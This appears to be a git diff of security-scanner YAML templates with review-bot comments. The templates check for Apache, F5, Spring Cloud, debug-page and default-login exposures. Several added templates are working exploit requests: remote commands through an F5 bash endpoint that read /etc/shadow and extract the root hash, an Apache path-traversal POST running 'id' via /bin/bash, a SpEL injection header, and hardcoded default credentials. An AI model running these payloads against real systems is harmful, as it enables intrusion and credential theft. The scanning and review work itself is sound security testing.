severity: critical + requests: + - raw: - | POST /mgmt/tm/util/bash HTTP/1.1 + User-Agent: Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1 Host: {{Hostname}} - Connection: keep-alive, X-F5-Auth-Token - X-F5-Auth-Token: a - Authorization: Basic {{base64(auth_var)}} - Content-Type: application/json + X-F5-Auth-Token: anything + Authorization: Basic YWRtaW46 + Accept: */* + Content-type: application/json + Connection: close, X-F5-Auth-Token, 
X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host + + {"command":"run", "utilCmdArgs": "-c 'cat /etc/shadow'"} + + - | - { - "command": "run", - "utilCmdArgs": "-c 'id;cmd_var'" - } + matchers: + - type : regex + part: body + regex: + - "root:.*" + + + extractors: - - type: regex + - type : regex part: body - name: result_command - group: 1 regex: - - "\"commandResult\":\"(.*)\"" - matchers: - - type: word - words: - - "commandResult" - - "uid=" - - "{{cmd_var}}" - - type: status - status: - - 200 - condition: and + - 'root:\$\d+\$\w+' diff --git a/poc/cve/rce-cve-2021-41773.yaml b/poc/cve/rce-cve-2021-41773.yaml index 87e89bc5e2..f8fd2f8e57 100644 --- a/poc/cve/rce-cve-2021-41773.yaml +++ b/poc/cve/rce-cve-2021-41773.yaml 
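Review bot: The new request body reads `/etc/shadow`, and the extractor `root:\$\d+\$\w+` copies the root password hash into the scan output, so every positive result leaves a credential in reports, CI logs and any ticket built from them. A detection check only needs proof that the command ran: keep a harmless marker as the removed version did (`"utilCmdArgs": "-c 'id'"`, matched on `commandResult` and `uid=` together with `status: 200`) and delete the `extractors` block. The second raw entry is an empty `- |`, which will either fail to parse or send a blank request. The hunk also strips description, reference, classification and tags, so the finding cannot be filtered or triaged by CVE.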
@@ -1,51 +1,16 @@ id: CVE-2021-41773 - info: - name: Apache 2.4.49 - Path Traversal and Remote Code Execution - author: daffainfo - severity: high - description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. - reference: - - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 - - https://twitter.com/ptswarm/status/1445376079548624899 - - https://twitter.com/h4x0r_dz/status/1445401960371429381 - - https://github.com/blasty/CVE-2021-41773 - remediation: Update to Apache HTTP Server 2.4.50 or later. 
- classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-41773 - cwe-id: CWE-22 - metadata: - shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 - tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,cisa - + name: RCE in Apache HTTP Server 2.4.49 + author: RafaelCaria + severity: critical + tags: cve,cve2021,rce requests: - - raw: - - | - GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 - Host: {{Hostname}} - - - | - POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev - - matchers-condition: or + - method: POST + path: + - '{{BaseURL}}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash' + body: 'echo;id' matchers: - - type: regex - name: LFI + part: body regex: - - "root:.*:0:0:" - - - type: word - name: RCE - words: - - "CVE-2021-41773-POC" - -# Enhanced by mp on 2022/02/27 + - "(uid|gid|groups)=\\d+|bytes from \b(?:[0-9]{1,3}\\.){3}[0-9]{1,3}\b" diff --git a/poc/cve/springForShell-CVE-2022-22963.yaml b/poc/cve/springForShell-CVE-2022-22963.yaml index f28360d6a7..0df514805b 100644 --- a/poc/cve/springForShell-CVE-2022-22963.yaml +++ b/poc/cve/springForShell-CVE-2022-22963.yaml 
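Review bot: In the added regex, `\b` sits inside a double-quoted YAML scalar, where it is the backspace escape. The `bytes from …` alternative therefore looks for a literal 0x08 character rather than a word boundary and will not match as intended; the `\\d` and `\\.` beside it are escaped correctly. Write `\\b` in both places, or use a single-quoted scalar such as `'(uid|gid|groups)=\d+|bytes from \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'`. The remaining matcher has no status check, and the hunk removes description, reference, classification and the `remediation` line ("Update to Apache HTTP Server 2.4.50 or later"), which are what a defender needs to act on a hit. I would restore those fields.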
@@ -1,44 +1,49 @@ id: CVE-2022-22963 info: - name: CVE-2022-22963 - Spring Cloud RCE - author: rdnt + name: Spring Cloud - Remote Code Execution + author: Mr-xn,Adam Crosser severity: critical - description: RCE on Spring cloud function SPEL - tags: cve,rce,spring,cve2022,injection + description: | + Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + reference: + - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f + - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE + - https://tanzu.vmware.com/security/cve-2022-22963 + - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ + - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection + - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-770 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-94 + epss-score: 0.97501 + tags: vulhub,cve,cve2022,springcloud,rce,kev + metadata: + max-request: 1 -requests: - - method: POST - path: - - "{{RootURL}}/functionRouter" - - "{{RootURL}}/api/functionRouter" - - "{{RootURL}}/api/v1/functionRouter" - - "{{RootURL}}/../../../../../../functionRouter" - - "{{RootURL}}/../../../../../../;functionRouter" - - "{{RootURL}}/spring/functionRouter" - - "{{RootURL}}/admin/functionRouter" - - "{{RootURL}}/../../../../../../../../functionRouter" - - "{{RootURL}}../../../../../../../../api/functionRouter" - - "{{RootURL}}../../../../../../../../api/v1/functionRouter" - - 
"{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" - - "{{RootURL}}%2fspring%2ffunctionRouter" - - "{{RootURL}}%2fadmin%2functionRouter" - headers: - spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") - Content-Type: application/x-www-form-urlencoded - body: exp +http: + - raw: + - | + POST /functionRouter HTTP/1.1 + Host: {{Hostname}} + spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}") + Content-Type: application/x-www-form-urlencoded + + {{rand_base(8)}} matchers-condition: and matchers: - - type: word - part: body - words: - - 'functionRouter' - - type: status - status: - - 500 \ No newline at end of file + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or + + - type: status + status: + - 500 + +# Enhanced by mp on 2022/05/19 diff --git a/poc/debug/coldfusion-debug-xss.yaml b/poc/debug/coldfusion-debug-xss.yaml index aedbabe04b..8031a8dd4a 100644 --- a/poc/debug/coldfusion-debug-xss.yaml +++ b/poc/debug/coldfusion-debug-xss.yaml @@ -4,7 +4,10 @@ info: author: dhiyaneshDK severity: medium description: The remote Adobe ColdFusion debug page has been left open to unauthenticated users, this could allow remote attackers to trigger a reflected cross site scripting against the visitors of the site. - reference: https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + reference: + - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/coldfusion-debug-xss.yaml + metadata: + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,xss requests: - method: GET diff --git a/poc/debug/laravel-debug-enabled-8574.yaml b/poc/debug/laravel-debug-enabled-8574.yaml index d9a0151104..3613dbd615 100644 --- a/poc/debug/laravel-debug-enabled-8574.yaml +++ b/poc/debug/laravel-debug-enabled-8574.yaml 
@@ -1,29 +1,19 @@ id: laravel-debug-enabled - info: name: Laravel Debug Enabled author: notsoevilweasel + description: Laravel with APP_DEBUG set to true prone to showing verbose errors. severity: medium - description: | - Laravel with APP_DEBUG set to true is prone to show verbose errors. - remediation: | - Disable Laravel's debug mode by setting APP_DEBUG to false. tags: debug,laravel,misconfig - metadata: - max-request: 1 - -http: +requests: - method: GET path: - "{{BaseURL}}/_ignition/health-check" - matchers-condition: and matchers: - type: word - part: body words: - can_execute_commands - - type: status status: - 200 diff --git a/poc/debug/pyramid-debug-toolbar.yaml b/poc/debug/pyramid-debug-toolbar.yaml index 9a8a0cce4a..c331cd99e1 100644 --- a/poc/debug/pyramid-debug-toolbar.yaml +++ b/poc/debug/pyramid-debug-toolbar.yaml @@ -6,12 +6,10 @@ info: reference: https://github.com/Pylons/pyramid_debugtoolbar severity: medium tags: pyramid,logs,exposure - requests: - method: GET path: - "{{BaseURL}}/_debug_toolbar/" - matchers-condition: and matchers: - type: word @@ -19,7 +17,6 @@ requests: - "Pyramid Debug Toolbar" - "Pyramid DebugToolbar" condition: and - - type: status status: - 200 diff --git a/poc/debug/wamp-xdebug-detect.yaml b/poc/debug/wamp-xdebug-detect.yaml index a0cff18d8e..c9dc3a07bb 100644 --- a/poc/debug/wamp-xdebug-detect.yaml +++ b/poc/debug/wamp-xdebug-detect.yaml @@ -1,17 +1,14 @@ id: wamp-xdebug-detect - info: name: WAMP xdebug author: e_schultze_ severity: info - # Inspired on https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py - # Goal: detect if xdebug.remote_connect_back is enabled - + reference: https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + tags: debug,config requests: - method: GET path: - "{{BaseURL}}/?phpinfo=-1" - matchers: - type: word words: 
diff --git a/poc/debug/werkzeug-debugger-detect-11197.yaml b/poc/debug/werkzeug-debugger-detect-11197.yaml index fe448bbca2..aa90f4c1a3 100644 --- a/poc/debug/werkzeug-debugger-detect-11197.yaml +++ b/poc/debug/werkzeug-debugger-detect-11197.yaml @@ -4,19 +4,14 @@ info: name: Werkzeug debugger console author: pdteam severity: info - metadata: - max-request: 1 tags: tech,werkzeug -http: +requests: - method: GET path: - "{{BaseURL}}/console" - matchers: - type: word words: - "

Interactive Console

" part: body - -# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/debug/wordpress-debug-log-11258.yaml b/poc/debug/wordpress-debug-log-11258.yaml index dee5e0d057..25e5e05c1e 100644 --- a/poc/debug/wordpress-debug-log-11258.yaml +++ b/poc/debug/wordpress-debug-log-11258.yaml @@ -1,9 +1,11 @@ id: wp-debug-log + info: name: WordPress debug log author: geraldino2 & @dwisiswant0 severity: low tags: wordpress,log + requests: - method: GET path: @@ -22,4 +24,4 @@ requests: part: body - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/default/activemq-default-login-47.yaml b/poc/default/activemq-default-login-47.yaml index a4dea884a5..ae5ac0f72c 100644 --- a/poc/default/activemq-default-login-47.yaml +++ b/poc/default/activemq-default-login-47.yaml @@ -1,18 +1,18 @@ id: activemq-default-login - info: name: Apache ActiveMQ Default Login author: pdteam severity: medium + description: Apache ActiveMQ default login information was discovered. + reference: + - https://knowledge.broadcom.com/external/article/142813/vulnerability-apache-activemq-admin-con.html tags: apache,activemq,default-login - requests: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} - payloads: username: - user @@ -26,4 +26,6 @@ requests: words: - 'Welcome to the Apache ActiveMQ Console of ' - '

Broker

' - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/07 diff --git a/poc/default/aem-default-get-servlet-139.yaml b/poc/default/aem-default-get-servlet-139.yaml index 274b345439..7186c2256f 100644 --- a/poc/default/aem-default-get-servlet-139.yaml +++ b/poc/default/aem-default-get-servlet-139.yaml @@ -1,26 +1,15 @@ id: aem-default-get-servlet - info: - name: AEM DefaultGetServlet author: DhiyaneshDk + name: AEM DefaultGetServlet severity: low - description: Sensitive information might be exposed via AEM DefaultGetServlet. - reference: - - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - tags: aem,adobe + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + requests: - method: GET path: - - '{{BaseURL}}/etc' - - '{{BaseURL}}/var' - - '{{BaseURL}}/apps' - - '{{BaseURL}}/home' - - '{{BaseURL}}///etc' - - '{{BaseURL}}///var' - - '{{BaseURL}}///apps' - - '{{BaseURL}}///home' - '{{BaseURL}}/.json' - '{{BaseURL}}/.1.json' - '{{BaseURL}}/....4.2.1....json' diff --git a/poc/default/ambari-default-login.yaml b/poc/default/ambari-default-login.yaml index e251839b56..75b4ec03c1 100644 --- a/poc/default/ambari-default-login.yaml +++ b/poc/default/ambari-default-login.yaml @@ -1,11 +1,16 @@ id: ambari-default-login - info: name: Apache Ambari Default Login author: pdteam - severity: medium + description: An Apache Ambari default admin login was discovered. + severity: high + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: ambari,default-login,apache - requests: - raw: - | 
@@ -24,3 +29,5 @@ requests: - '"Users" : {' - 'AMBARI.' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/default/apisix-default-login-490.yaml b/poc/default/apisix-default-login-490.yaml index c16b0c60b1..d89104b847 100644 --- a/poc/default/apisix-default-login-490.yaml +++ b/poc/default/apisix-default-login-490.yaml @@ -1,13 +1,22 @@ id: apisix-default-login + info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + tags: apisix,apache,default-login + requests: - raw: - | @@ -18,20 +27,25 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork payloads: user: - admin pass: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - '"data"' - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/default/apollo-default-login.yaml b/poc/default/apollo-default-login.yaml index 696e2a1121..c9e119d097 100644 --- a/poc/default/apollo-default-login.yaml +++ b/poc/default/apollo-default-login.yaml 
@@ -1,18 +1,20 @@ id: apollo-default-login + info: name: Apollo Default Login author: PaperPen severity: high description: An Apollo default login was discovered. - metadata: - shodan-query: http.favicon.hash:11794165 reference: - https://github.com/apolloconfig/apollo classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 + metadata: + shodan-query: http.favicon.hash:11794165 tags: apollo,default-login + requests: - raw: - | @@ -23,15 +25,18 @@ requests: Referer: {{BaseURL}}/signin? username={{user}}&password={{pass}}&login-submit=Login + - | GET /user HTTP/1.1 Host: {{Hostname}} + attack: pitchfork payloads: user: - apollo pass: - admin + cookie-reuse: true req-condition: true matchers-condition: and @@ -42,6 +47,7 @@ requests: - '"userId":' - '"email":' condition: or + - type: dsl dsl: - "status_code_1 == 302 && status_code_2 == 200" diff --git a/poc/default/arl-default-login-539.yaml b/poc/default/arl-default-login-539.yaml index 50f4ac4d1c..0b8d67077d 100644 --- a/poc/default/arl-default-login-539.yaml +++ b/poc/default/arl-default-login-539.yaml @@ -1,13 +1,8 @@ id: arl-default-login info: - name: ARL Default Admin Login + name: ARL Default Login author: pikpikcu - description: An ARL default admin login was discovered. severity: high - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 tags: arl,default-login requests: - raw: @@ -34,5 +29,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/poc/default/azkaban-default-login-674.yaml b/poc/default/azkaban-default-login-674.yaml index 5e705ae10d..5d9e13ca58 100644 --- a/poc/default/azkaban-default-login-674.yaml +++ b/poc/default/azkaban-default-login-674.yaml 
@@ -1,47 +1,47 @@ -id: azkaban-default-login -info: - name: Azkaban Web Client Default Credential - author: pussycat0x - severity: high - description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. - reference: - - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 - tags: default-login,azkaban - classification: - cwe-id: CWE-798 -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - action=login&username={{username}}&password={{password}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers-condition: and - matchers: - - type: word - words: - - '"session.id"' - - '"success"' - condition: and - - type: word - words: - - 'azkaban.browser.session.id' - - 'application/json' - condition: and - part: header - - type: status - status: - - 200 - extractors: - - type: kval - kval: - - azkaban.browser.session.id - -# Enhanced by mp on 2022/03/03 +id: azkaban-default-login + +info: + name: Azkaban Web Client Default Credential + author: pussycat0x + severity: high + reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + tags: default-login,azkaban + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=login&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - '"session.id"' + - '"success"' + condition: and + + - type: word + words: + - 'azkaban.browser.session.id' + - 'application/json' + condition: and + part: header + + - type: status + status: + - 200 + + extractors: + - type: kval + kval: + - azkaban.browser.session.id 
diff --git a/poc/default/canal-default-login-848.yaml b/poc/default/canal-default-login-848.yaml index a4c4a1b801..733d7d16f3 100644 --- a/poc/default/canal-default-login-848.yaml +++ b/poc/default/canal-default-login-848.yaml @@ -1,11 +1,16 @@ id: canal-default-login - info: name: Alibaba Canal Default Login author: pdteam + description: An Alibaba Canal default login was discovered. severity: high + reference: + - https://github.com/alibaba/canal/wiki/ClientAdapter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: alibaba,default-login - requests: - raw: - | @@ -14,22 +19,21 @@ requests: Content-Type: application/json {"username":"{{user}}","password":"{{pass}}"} - attack: pitchfork payloads: user: - admin pass: - 123456 - matchers-condition: and matchers: - type: status status: - 200 - - type: word condition: and words: - 'data":{"token"' - '"code":20000' + +# Enhanced by mp on 2022/03/22 diff --git a/poc/default/cs141-default-login.yaml b/poc/default/cs141-default-login.yaml index 1a1610de31..a7c1b33bda 100644 --- a/poc/default/cs141-default-login.yaml +++ b/poc/default/cs141-default-login.yaml @@ -1,16 +1,12 @@ id: cs141-default-login info: - name: UPS Adapter CS141 SNMP Module Default Login + name: CS141 SNMP Module Default Login author: socketz severity: medium - description: UPS Adapter CS141 SNMP Module default login credentials were discovered. - reference: - - https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf - classification: - cwe-id: CWE-798 - metadata: - shodan-query: http.html:"CS141" + reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf tags: hiawatha,iot,default-login + metadata: + shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22 requests: - raw: - | @@ -46,5 +42,3 @@ requests: - type: kval kval: - accessToken - -# Enhanced by mp on 2022/03/07 
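Review bot: In the first hunk of cs141-default-login.yaml the new `shodan-query` value is a full search URL (`https://www.shodan.io/search?query=html%3A%22CS141%22`) rather than a query expression, unlike the other `metadata` blocks in this patch. Tooling that reads the field as a query would presumably send the URL as the search term. The removed line already had the usable form, so I would restore `shodan-query: http.html:"CS141"`. The same hunk also drops `cwe-id: CWE-798` and the description, so the finding loses its weakness mapping in reports.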
diff --git a/poc/default/default-apache-test-page-6816.yaml b/poc/default/default-apache-test-page-6816.yaml index d76fd5ac60..ade74d648c 100644 --- a/poc/default/default-apache-test-page-6816.yaml +++ b/poc/default/default-apache-test-page-6816.yaml @@ -4,8 +4,8 @@ info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 + metadata: + shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" tags: tech,apache requests: diff --git a/poc/default/default-centos-test-page-6826.yaml b/poc/default/default-centos-test-page-6826.yaml index 21c836f3cc..896f0ad6c1 100644 --- a/poc/default/default-centos-test-page-6826.yaml +++ b/poc/default/default-centos-test-page-6826.yaml @@ -1,17 +1,23 @@ id: default-centos-test-page + info: name: CentOs-WebPanel Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22HTTP+Server+Test+Page+powered+by+CentOS-WebPanel.com%22 + metadata: + max-request: 1 + shodan-query: http.title:"HTTP Server Test Page powered by CentOS-WebPanel.com" tags: tech,centos -requests: + +http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: - "HTTP Server Test Page powered by CentOS-WebPanel.com" part: body + +# digest: 490a0046304402203469f2a4a3465618ba629eb99f7f49193eca7b9a5eacba23ff84a44ada460a8202201ed4a6932ca791598a736d32c70c4c6b14278c05046ba7dd36094d99da764e91:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/default-django-page-6841.yaml b/poc/default/default-django-page-6841.yaml index 450d7e265c..cf3cf5a7f7 100644 --- a/poc/default/default-django-page-6841.yaml +++ b/poc/default/default-django-page-6841.yaml 
@@ -3,8 +3,8 @@ info: name: Django Default Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22The+install+worked+successfully%21+Congratulations%21%22 + metadata: + shodan-query: http.title:"The install worked successfully! Congratulations!" tags: tech,django requests: - method: GET diff --git a/poc/default/default-iis7-page.yaml b/poc/default/default-iis7-page.yaml index b62a6ed622..30e3de8e56 100644 --- a/poc/default/default-iis7-page.yaml +++ b/poc/default/default-iis7-page.yaml @@ -1,17 +1,18 @@ id: default-iis7-page + info: - name: IIS-7 Default Page - author: dhiyaneshDk + name: IIS Error page on css all languages + author: yavolo severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22IIS7%22 tags: tech,iis + reference: https://github.com/yavolo/nuclei-templates/ + requests: - method: GET path: - - '{{BaseURL}}' + - '{{BaseURL}}/does-not-exist-iis-404' matchers: - - type: word - words: - - "IIS7" + - type: regex + regex: + - "#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:" part: body diff --git a/poc/default/default-openresty.yaml b/poc/default/default-openresty.yaml index 401ac8779f..cfe73c1a3a 100644 --- a/poc/default/default-openresty.yaml +++ b/poc/default/default-openresty.yaml @@ -1,12 +1,11 @@ id: default-openresty - info: name: OpenResty Default Page author: dhiyaneshDk severity: info - tags: tech,openrestry - reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 - + reference: + - https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22 + tags: tech,openresty requests: - method: GET path: diff --git a/poc/default/default-oracle-application-page-6891.yaml b/poc/default/default-oracle-application-page-6891.yaml index e96a481921..263c5493f5 100644 --- a/poc/default/default-oracle-application-page-6891.yaml +++ b/poc/default/default-oracle-application-page-6891.yaml 
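Review bot: default-iis7-page.yaml keeps `id: default-iis7-page`, but the new body no longer looks for the IIS7 default page: it requests `{{BaseURL}}/does-not-exist-iis-404` and matches error-page CSS. Results keyed by that id will be labelled as a default-page finding when they actually mean "an IIS error page was served". I would give the check an id and name that describe the error-page probe. The matcher is a literal string containing `{` and `%`, so `- type: word` with `words:` is the safer form than `- type: regex`, which hands the text to the regex parser. The author and reference now point at a personal fork, so the provenance of this replacement is worth confirming before it is run.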
@@ -1,10 +1,12 @@ id: default-oracle-application-page + info: name: Oracle Application Server Containers author: dhiyaneshDk severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 tags: tech,oracle + reference: https://www.shodan.io/search?query=http.title%3A%22Oracle+Application+Server+Containers%22 + requests: - method: GET path: diff --git a/poc/default/default-redhat-test-page-6903.yaml b/poc/default/default-redhat-test-page-6903.yaml index b46474eadd..518c8f746f 100644 --- a/poc/default/default-redhat-test-page-6903.yaml +++ b/poc/default/default-redhat-test-page-6903.yaml @@ -1,17 +1,23 @@ id: default-redhat-test-page + info: name: Red Hat Enterprise Linux Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Test+Page+for+the+Apache+HTTP+Server+on+Red+Hat+Enterprise+Linux%22 + metadata: + max-request: 1 + shodan-query: http.title:"Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" tags: tech,redhat -requests: + +http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: - "Test Page for the Apache HTTP Server on Red Hat Enterprise Linux" part: body + +# digest: 4a0a0047304502200f10ec858e5a0347954ce4a1aed87801cc3cb17fa2446ad2a57f18b51344789b0221008347e4e3282fc734b53c8e559998af04e319cc89a9952e6479cabf9622008681:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/dell-idrac-default-login-6943.yaml b/poc/default/dell-idrac-default-login-6943.yaml index 09fa2b2673..d4e68fe296 100644 --- a/poc/default/dell-idrac-default-login-6943.yaml +++ b/poc/default/dell-idrac-default-login-6943.yaml 
@@ -4,28 +4,24 @@ info: author: kophjager007 severity: high tags: dell,idrac,default-login -requests: - - raw: - - | - POST /data/login HTTP/1.1 - Host: {{Hostname}} - user={{username}}&password={{password}} - payloads: - username: - - root - password: - - calvin - attack: pitchfork +requests: + - method: POST + cookie-reuse: true + path: + - "{{BaseURL}}/data/login" + body: "user=root&password=calvin" headers: - Content-Type: "application/x-www-form-urlencode" + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 + Content-Type: application/x-www-form-urlencode Referer: "{{BaseURL}}/login.html" - cookie-reuse: true + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - '0' + - 0 diff --git a/poc/default/dell-idrac9-default-login.yaml b/poc/default/dell-idrac9-default-login.yaml index 9317d085ee..d60325405b 100644 --- a/poc/default/dell-idrac9-default-login.yaml +++ b/poc/default/dell-idrac9-default-login.yaml @@ -1,22 +1,26 @@ id: dell-idrac9-default-login + info: name: DELL iDRAC9 Default Login author: kophjager007,milo2012 severity: high tags: dell,idrac,default-login + requests: - raw: - | POST /sysmgmt/2015/bmc/session HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 - Accept: application/json, text/plain, */* - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - User: "root" - Password: "calvin" - Content-Length: 0 - Connection: close + User: "{{username}}" + Password: "{{password}}" + + payloads: + username: + - root + password: + - calvin + attack: pitchfork + matchers-condition: and matchers: - type: status @@ -24,6 +28,7 @@ requests: - 201 - 200 condition: or + - type: word part: body words: diff --git a/poc/default/druid-default-login.yaml b/poc/default/druid-default-login.yaml index 4dd778392e..1a787c7ba6 100644 --- a/poc/default/druid-default-login.yaml +++ b/poc/default/druid-default-login.yaml 
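Review bot: Two added lines in dell-idrac-default-login-6943.yaml make the check unreliable. The header `Content-Type: application/x-www-form-urlencode` is missing its final `d`, so the endpoint may not parse the form body and a device that still has default credentials could go unreported. The word matcher changed from `'0'` to a bare `- 0`, which YAML reads as an integer, and a one-character word will match almost any 200 response body. I would write `Content-Type: application/x-www-form-urlencoded` and `- '0'`, and preferably match a longer token from the login response. The credentials are now inlined in `body`, whereas the dell-idrac9 hunk that follows moves them into `payloads`; using one style for both files keeps them auditable.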
